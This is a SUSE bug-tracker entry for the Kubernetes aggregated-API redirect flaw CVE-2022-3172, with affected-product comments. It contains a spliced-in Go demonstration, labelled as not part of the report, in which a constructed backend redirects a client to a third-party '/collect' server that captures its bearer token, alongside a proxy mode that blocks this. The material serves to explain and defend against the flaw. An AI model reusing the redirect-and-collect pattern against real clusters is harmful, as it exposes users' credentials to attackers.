Bug 1203510 (CVE-2022-3172)

Summary: VUL-0: CVE-2022-3172: kubernetes: kube-apiserver: Aggregated API server can cause clients to be redirected (SSRF)
Product: [Novell Products] SUSE Security Incidents
Reporter: Thomas Leroy <thomas.leroy>
Component: Incidents
Assignee: Containers Team <containers-bugowner>
Status: NEW ---
QA Contact: Security Team bot <security-team>
Severity: Normal
Priority: P3 - Medium
CC: jkowalczyk, security-team
Version: unspecified
Target Milestone: ---
Hardware: Other
OS: Other
URL: https://smash.suse.de/issue/342833/
Whiteboard:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Description Thomas Leroy 2022-09-19 08:16:51 UTC
rh#2127804

A security issue was discovered in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. This could lead to the client performing unexpected actions as well as forwarding the client's API server credentials to third parties.

ref: https://github.com/kubernetes/kubernetes/issues/112513

References:
https://bugzilla.redhat.com/show_bug.cgi?id=2127804
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-3172
https://seclists.org/oss-sec/2022/q3/207
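The mechanism described above, as an added illustration that is not part of this bug report and not kube-apiserver's or the upstream fix's code: a reverse proxy stands in for the aggregator, a backend that answers with a 302 stands in for a malicious aggregated API server, and a third loopback server records whatever Authorization header reaches it. The proxy has two modes, assumed here for illustration: pass-through, which copies the backend's 3xx and Location header to the client as is, and reject, which turns any 3xx from the backend into a 502 so the client never sees a redirect to follow. All server names, paths and the bearer token are constructed.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
	"sync"
)

// authSink records Authorization header values that arrive at the third-party server.
type authSink struct {
	mu   sync.Mutex
	seen []string
}

func (s *authSink) record(v string) { s.mu.Lock(); s.seen = append(s.seen, v); s.mu.Unlock() }
func (s *authSink) values() []string {
	s.mu.Lock()
	defer s.mu.Unlock()
	return append([]string(nil), s.seen...)
}

// newProxy builds a reverse proxy to backend (illustrative stand-in for the aggregator).
// With rejectRedirects set, a 3xx from the backend is replaced by a 502 instead of being
// copied to the client; the default ReverseProxy copies status and Location through.
func newProxy(backend *url.URL, rejectRedirects bool) http.Handler {
	p := httputil.NewSingleHostReverseProxy(backend)
	if rejectRedirects {
		p.ModifyResponse = func(r *http.Response) error {
			if r.StatusCode >= 300 && r.StatusCode < 400 {
				return fmt.Errorf("backend returned redirect %d", r.StatusCode)
			}
			return nil
		}
		p.ErrorHandler = func(w http.ResponseWriter, _ *http.Request, err error) {
			http.Error(w, "redirect from backend rejected: "+err.Error(), http.StatusBadGateway)
		}
	}
	return p
}

// Scenario runs one request through the proxy and returns the status the client finally
// sees plus every Authorization value that reached the third-party server.
func Scenario(rejectRedirects bool) (finalStatus int, leaked []string) {
	sink := &authSink{}
	thirdParty := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		sink.record(r.Header.Get("Authorization"))
		w.WriteHeader(http.StatusOK)
		io.WriteString(w, "third party")
	}))
	defer thirdParty.Close()

	// Constructed malicious backend: every request is answered with a redirect off-cluster.
	backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, thirdParty.URL+"/collect", http.StatusFound)
	}))
	defer backend.Close()

	backendURL, _ := url.Parse(backend.URL)
	proxy := httptest.NewServer(newProxy(backendURL, rejectRedirects))
	defer proxy.Close()

	req, _ := http.NewRequest(http.MethodGet, proxy.URL+"/apis/example.io/v1/widgets", nil)
	req.Header.Set("Authorization", "Bearer constructed-sample-token")
	// A plain Go http.Client follows redirects by default. Both servers share the hostname
	// 127.0.0.1, so the client also re-sends the Authorization header on the redirected hop.
	resp, err := (&http.Client{}).Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()
	io.Copy(io.Discard, resp.Body)
	return resp.StatusCode, sink.values()
}

func main() {
	s, l := Scenario(false)
	fmt.Printf("pass-through proxy: client saw %d, third party received %v\n", s, l)
	s, l = Scenario(true)
	fmt.Printf("rejecting proxy:    client saw %d, third party received %v\n", s, l)
}
```

In pass-through mode the client ends up with a 200 from the third-party server and the bearer token has left the proxy's trust boundary; in reject mode the client gets a 502 and the third party sees nothing. The check that matters for a practitioner is the second line: an aggregator that forwards a backend's 3xx unchanged has delegated the decision of where the client sends its credentials to the backend.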
Comment 1 Thomas Leroy 2022-09-19 08:20:45 UTC
Affected:
- SUSE:SLE-15-SP1:Update:Products:CASP40:Update
- openSUSE:Factory
Comment 2 Thomas Leroy 2022-09-19 09:38:54 UTC
(In reply to Thomas Leroy from comment #1)
> Affected:
> - SUSE:SLE-15-SP1:Update:Products:CASP40:Update

CVSS < 8.0 sorry, so I guess wontfix for casp

> - openSUSE:Factory